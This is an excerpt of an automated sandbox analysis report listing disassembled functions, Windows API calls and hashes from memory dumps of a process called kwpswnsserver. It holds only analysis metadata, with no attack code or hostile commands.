                                                                  • API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
                                                                  • String ID: DragDelay$DragMinDist$windows
                                                                  • API String ID: 3965097884-2101198082
                                                                  • Opcode ID: d44d3896ddbb63f5eb86f0e9aef4fcfd07883039995abf0a4747fc2136fb93bc
                                                                  • Instruction ID: 9c78c2c3a018247b424bfcf5cb420ba3a85e08eb5a33a00add127a360bb841b1
                                                                  • Opcode Fuzzy Hash: d44d3896ddbb63f5eb86f0e9aef4fcfd07883039995abf0a4747fc2136fb93bc
                                                                  • Instruction Fuzzy Hash: AD014CB0B057019EDBA0DF7C9A0674ABAF0BB08708F408D2DE049CBA40D7B49582CF55
                                                                  Function 0427F9C4 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___set_flsgetvalue.LIBCMT ref: 0427F9CA
                                                                    • Part of subcall function 04283CA0: TlsGetValue.KERNEL32(00000000,04283DF9,?,04284500,00000000,00000001,00000000,?,04288DE6,00000018,04296448,0000000C,04288E76,00000000,00000000), ref: 04283CA9
                                                                    • Part of subcall function 04283CA0: DecodePointer.KERNEL32(?,04284500,00000000,00000001,00000000,?,04288DE6,00000018,04296448,0000000C,04288E76,00000000,00000000,?,04283F06,0000000D), ref: 04283CBB
                                                                    • Part of subcall function 04283CA0: TlsSetValue.KERNEL32(00000000,?,04284500,00000000,00000001,00000000,?,04288DE6,00000018,04296448,0000000C,04288E76,00000000,00000000,?,04283F06), ref: 04283CCA
                                                                  • ___fls_getvalue@4.LIBCMT ref: 0427F9D5
                                                                    • Part of subcall function 04283C80: TlsGetValue.KERNEL32(?,?,0427F9DA,00000000), ref: 04283C8E
                                                                  • ___fls_setvalue@8.LIBCMT ref: 0427F9E8
                                                                    • Part of subcall function 04283CD4: DecodePointer.KERNEL32(?,?,?,0427F9ED,00000000,?,00000000), ref: 04283CE5
                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 0427F9F1
                                                                  • ExitThread.KERNEL32 ref: 0427F9F8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0427F9FE
                                                                  • __freefls@4.LIBCMT ref: 0427FA1E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                  • String ID:
                                                                  • API String ID: 2383549826-0
                                                                  • Opcode ID: 6a4752e0d5165cd08e8f4b03ec942f3b248498bea112475dd64b71dce19e71b4
                                                                  • Instruction ID: a3cb6249a30e3045408f94a72e852b5bd36bc0f33c2a41cc4e14b9e134515fe6
                                                                  • Opcode Fuzzy Hash: 6a4752e0d5165cd08e8f4b03ec942f3b248498bea112475dd64b71dce19e71b4
                                                                  • Instruction Fuzzy Hash: 32F09674725301FBD708FF70D60880E7BA8EF59249321885CED0587241DE35F841C7A5
                                                                  Function 6C9E2992 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bc19857a996d95e08f4adbb42306b25894b4ed660bee33c11e772a4c643ba16
                                                                  • Instruction ID: 9cce821527022e96e90a7859c3dcca27c1f567b588e62cd8d17adc1dd194b259
                                                                  • Opcode Fuzzy Hash: 9bc19857a996d95e08f4adbb42306b25894b4ed660bee33c11e772a4c643ba16
                                                                  • Instruction Fuzzy Hash: 26B1F270B04A4A9FEB06CF98C844BAD7BB5BF7A318F148198E514AB781C774D942CB61
                                                                  Function 6C879CD0 Relevance: 9.2, APIs: 6, Instructions: 240COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32 ref: 6C879D7B
                                                                  • SHGetFolderPathA.SHELL32 ref: 6C879DC4
                                                                  • GetFileAttributesA.KERNEL32 ref: 6C879EBF
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile$FolderPath
                                                                  • String ID:
                                                                  • API String ID: 1382956649-0
                                                                  • Opcode ID: f31ede52a039674af7d588bb98a9811d88c71c5d475e8485c1c656d63179ced4
                                                                  • Instruction ID: 6bbbee1de2771004db2767ce15c22c7c7f41cd017dd500230776ef1ff38ec62f
                                                                  • Opcode Fuzzy Hash: f31ede52a039674af7d588bb98a9811d88c71c5d475e8485c1c656d63179ced4
                                                                  • Instruction Fuzzy Hash: 2DB11DB4904314CFCB24EF68C9547DDBBB0BF45304F4089AAD4199B790EB759A89CF92
                                                                  Function 6C879760 Relevance: 9.1, APIs: 6, Instructions: 115processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleProcess32$ByteCharCreateFirstMultiNextSnapshotToolhelp32Wide
                                                                  • String ID:
                                                                  • API String ID: 199250714-0
                                                                  • Opcode ID: ff44fb5004fe65500b73c4e017eec25061cd116eba0c9ab467872abb5a7cf602
                                                                  • Instruction ID: 2f365c41af5e977bc8925aad4a084b7dc9389c041201689d2501a3c622994a4c
                                                                  • Opcode Fuzzy Hash: ff44fb5004fe65500b73c4e017eec25061cd116eba0c9ab467872abb5a7cf602
                                                                  • Instruction Fuzzy Hash: 2C51F6B09083589FDB25DF68C94479DBBF8AB05304F0489EAD498A7740E7359B89CF52
                                                                  Function 04276690 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 0427669B
                                                                  • CoCreateInstance.OLE32(042946FC,00000000,00000001,0429471C,?,?,?,?,?,?,?,?,?,?,0427588A), ref: 042766B2
                                                                  • SysFreeString.OLEAUT32(?), ref: 0427674C
                                                                  • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,0427588A), ref: 0427677D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                  • String ID: FriendlyName
                                                                  • API String ID: 841178590-3623505368
                                                                  • Opcode ID: 5d5c8059d645e97b33b70778b3250d9308ac8665fbf1663aa8d7724fb78d34ab
                                                                  • Instruction ID: a1d77dddfa4f6f589c2aa26e89c684f527b2ee66c99fa1dd8c602185c52611c2
                                                                  • Opcode Fuzzy Hash: 5d5c8059d645e97b33b70778b3250d9308ac8665fbf1663aa8d7724fb78d34ab
                                                                  • Instruction Fuzzy Hash: 3B312875B1060AAFDB00DB99DC84EAEB7B9EF88714F148598E504EB250DA71FD02CB60
                                                                  Function 0427F707 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 0427F721
                                                                    • Part of subcall function 0427F673: __FF_MSGBANNER.LIBCMT ref: 0427F68C
                                                                    • Part of subcall function 0427F673: __NMSG_WRITE.LIBCMT ref: 0427F693
                                                                    • Part of subcall function 0427F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04284500,00000000,00000001,00000000,?,04288DE6,00000018,04296448,0000000C,04288E76), ref: 0427F6B8
                                                                  • std::exception::exception.LIBCMT ref: 0427F756
                                                                  • std::exception::exception.LIBCMT ref: 0427F770
                                                                  • __CxxThrowException@8.LIBCMT ref: 0427F781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                  • String ID: bad allocation
                                                                  • API String ID: 615853336-2104205924
                                                                  • Opcode ID: df8c9b4b505d773d37c3917523adad60aa0864fbfcff43910bb71e92174d5b99
                                                                  • Instruction ID: e34b2905ee8ab85fb0980c36636c968a6937df9e96cda3c5f0cc7868e4e564ac
                                                                  • Opcode Fuzzy Hash: df8c9b4b505d773d37c3917523adad60aa0864fbfcff43910bb71e92174d5b99
                                                                  • Instruction Fuzzy Hash: 38F0D171B3420AABEF44EF58EA34A6E37E8AB45258F160099E414D60D0DFB0FE058A91
                                                                  Function 6C864A68 Relevance: 7.8, APIs: 5, Instructions: 310fileprocessCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CopyFile$CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 3066332969-0
                                                                  • Opcode ID: fc113416317a8bcc15ddf47cbc1a784980858a966dadcb2b70d70744ebbf74d4
                                                                  • Instruction ID: 231f38de71245201f498f3a4fb8a826e18863646ef3d5e6aa430fab6361329cb
                                                                  • Opcode Fuzzy Hash: fc113416317a8bcc15ddf47cbc1a784980858a966dadcb2b70d70744ebbf74d4
                                                                  • Instruction Fuzzy Hash: 9EE105B0505B00CFD365DF29C6987D6BBE0BF45308F808D2DD4AA4BB61DB71A949CB92
                                                                  Function 6C9C1F48 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                  • String ID:
                                                                  • API String ID: 3136044242-0
                                                                  • Opcode ID: 885250a5a9e75f9efa5da7bcec5b4747ae1ed0be007d0ae830432ccf68a544bf
                                                                  • Instruction ID: 0f85a310ced95496f9cd81350f4d94852c8c73349a872f226c87c6707ee72f6a
                                                                  • Opcode Fuzzy Hash: 885250a5a9e75f9efa5da7bcec5b4747ae1ed0be007d0ae830432ccf68a544bf
                                                                  • Instruction Fuzzy Hash: 98217171F01615EBCB218E55CC44EAF3A7DEBA6A98B118116F81467B10C330CD118BA7
                                                                  Function 6C89A671 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(Shell32,00000000,?,6C87CD8A), ref: 6C89A67C
                                                                  • GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID), ref: 6C89A68D
                                                                  Strings
                                                                  • SetCurrentProcessExplicitAppUserModelID, xrefs: 6C89A687
                                                                  • Shell32, xrefs: 6C89A675
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: SetCurrentProcessExplicitAppUserModelID$Shell32
                                                                  • API String ID: 1646373207-2658420654
                                                                  • Opcode ID: f1fd2154cd3b2c09c1aa0c4a21940aaa167bc9f5deee36c6582a9ff4f9fce484
                                                                  • Instruction ID: ed0236fd7e651d8e4fda7bb5f49160e923800a3b1590cf7184b5b5758763b71b
                                                                  • Opcode Fuzzy Hash: f1fd2154cd3b2c09c1aa0c4a21940aaa167bc9f5deee36c6582a9ff4f9fce484
                                                                  • Instruction Fuzzy Hash: C6E04F31B017396B8A296B69DD2C85B7BA8EA916A6340852AF909C3600DB20DD01C6A4
                                                                  Function 6C889485 Relevance: 6.1, APIs: 4, Instructions: 121threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C88948F
                                                                    • Part of subcall function 6C8982A0: __EH_prolog3.LIBCMT ref: 6C8982A7
                                                                  • GetCurrentThread.KERNEL32 ref: 6C8894EE
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C8894F7
                                                                  • GetVersionExW.KERNEL32 ref: 6C889593
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$H_prolog3H_prolog3_Version
                                                                  • String ID:
                                                                  • API String ID: 786120064-0
                                                                  • Opcode ID: 88ae526b58057e5468aa53967c101694c7679628fb1d9541e7e9fb112485fbe7
                                                                  • Instruction ID: df06c2e4d575a0d71b3ae8de200185f9be41de74d4d4ec320d2d30416f9eb580
                                                                  • Opcode Fuzzy Hash: 88ae526b58057e5468aa53967c101694c7679628fb1d9541e7e9fb112485fbe7
                                                                  • Instruction Fuzzy Hash: 9851E5B0A01B158FD725CF6A868468AFBF1BF49304F508A6ED59EC7B50DB30A945CF40
                                                                  Function 6C89E2B7 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003), ref: 6C89E314
                                                                  • VerSetConditionMask.KERNEL32(00000000), ref: 6C89E31C
                                                                  • VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6C89E32D
                                                                  • GetSystemMetrics.USER32(00001000), ref: 6C89E33E
                                                                    • Part of subcall function 6C89E374: __EH_prolog3.LIBCMT ref: 6C89E37B
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000016), ref: 6C89E384
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000000F), ref: 6C89E397
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000015), ref: 6C89E3AE
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000000F), ref: 6C89E3BA
                                                                    • Part of subcall function 6C89E374: GetDeviceCaps.GDI32(?,0000000C), ref: 6C89E3E2
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000000F), ref: 6C89E3F0
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000010), ref: 6C89E3FE
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000015), ref: 6C89E40C
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000016), ref: 6C89E41A
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000014), ref: 6C89E428
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000012), ref: 6C89E436
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000011), ref: 6C89E444
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000006), ref: 6C89E44F
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000000D), ref: 6C89E45A
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000000E), ref: 6C89E465
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000005), ref: 6C89E470
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000008), ref: 6C89E47E
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000009), ref: 6C89E489
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000007), ref: 6C89E494
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000002), ref: 6C89E49F
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(00000003), ref: 6C89E4AA
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000001B), ref: 6C89E4B8
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000001C), ref: 6C89E4C6
                                                                    • Part of subcall function 6C89E374: GetSysColor.USER32(0000000A), ref: 6C89E4D4
                                                                    • Part of subcall function 6C89E792: __EH_prolog3_GS.LIBCMT ref: 6C89E79C
                                                                    • Part of subcall function 6C89E792: GetDeviceCaps.GDI32(?,00000058), ref: 6C89E7BC
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E818
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E836
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E854
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E872
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E890
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E8AE
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E8CC
                                                                    • Part of subcall function 6C89E792: DeleteObject.GDI32(00000000), ref: 6C89E8EA
                                                                    • Part of subcall function 6C89ECB1: GetSystemMetrics.USER32(00000031), ref: 6C89ECBF
                                                                    • Part of subcall function 6C89ECB1: GetSystemMetrics.USER32(00000032), ref: 6C89ECCD
                                                                    • Part of subcall function 6C89ECB1: SetRectEmpty.USER32(?), ref: 6C89ECE0
                                                                    • Part of subcall function 6C89ECB1: EnumDisplayMonitors.USER32(00000000,00000000,6C89F489,?,?,?), ref: 6C89ECF0
                                                                    • Part of subcall function 6C89ECB1: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6C89ECFF
                                                                    • Part of subcall function 6C89ECB1: SystemParametersInfoW.USER32(00001002,00000000,?,00000000), ref: 6C89ED2C
                                                                    • Part of subcall function 6C89ECB1: SystemParametersInfoW.USER32(00001012,00000000,?,00000000), ref: 6C89ED40
                                                                    • Part of subcall function 6C89ECB1: SystemParametersInfoW.USER32(0000100A,00000000,?,00000000), ref: 6C89ED66
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Color$DeleteObject$System$Info$Parameters$Metrics$CapsConditionDeviceMask$DisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectVerifyVersion
                                                                  • String ID:
                                                                  • API String ID: 2442922003-0
                                                                  • Opcode ID: eda10dffa556edda52d64fc830cb76b0b10228b24ecc839df2722051447cd426
                                                                  • Instruction ID: 80f5076fb8112c64c885063f7195de45c769bda16c4caa14132b0574f27f0397
                                                                  • Opcode Fuzzy Hash: eda10dffa556edda52d64fc830cb76b0b10228b24ecc839df2722051447cd426
                                                                  • Instruction Fuzzy Hash: 4F1194B1A00318ABDB349F75DC55BEA7BBCAB89708F00456DA145D2280DB745A458B90
                                                                  Function 04273160 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0427316B
                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 04273183
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0427322F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$ExchangeInterlocked
                                                                  • String ID:
                                                                  • API String ID: 4033114805-0
                                                                  • Opcode ID: 194873bfbc357a62b95ccdc07388b1e4edfac0ed9c91f50a83259bc304fd627d
                                                                  • Instruction ID: 3928527590657219f165309a434edfe8d9c975497e48f09843f1c78b2682b6eb
                                                                  • Opcode Fuzzy Hash: 194873bfbc357a62b95ccdc07388b1e4edfac0ed9c91f50a83259bc304fd627d
                                                                  • Instruction Fuzzy Hash: BC318770320602AFD728DF69C884A6AB3E4FF44348B10C56CE91ACB615EB31FC41DB90
                                                                  Function 042711B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __floor_pentium4.LIBCMT ref: 042711E9
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04271226
                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04271255
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                  • String ID:
                                                                  • API String ID: 2605973128-0
                                                                  • Opcode ID: f15b21570deef90dbebdec3c1b00720d9b26ec100a3d10530557ed47c9d2fb86
                                                                  • Instruction ID: fac95313fe3c188f3ec5c499d6060e337660a498c67feb89a86cb7aa475777aa
                                                                  • Opcode Fuzzy Hash: f15b21570deef90dbebdec3c1b00720d9b26ec100a3d10530557ed47c9d2fb86
                                                                  • Instruction Fuzzy Hash: CE218E71B10609AFDB149FAEE845B6EBBF8EF40705F0089ADE959A2640EA74BC508750
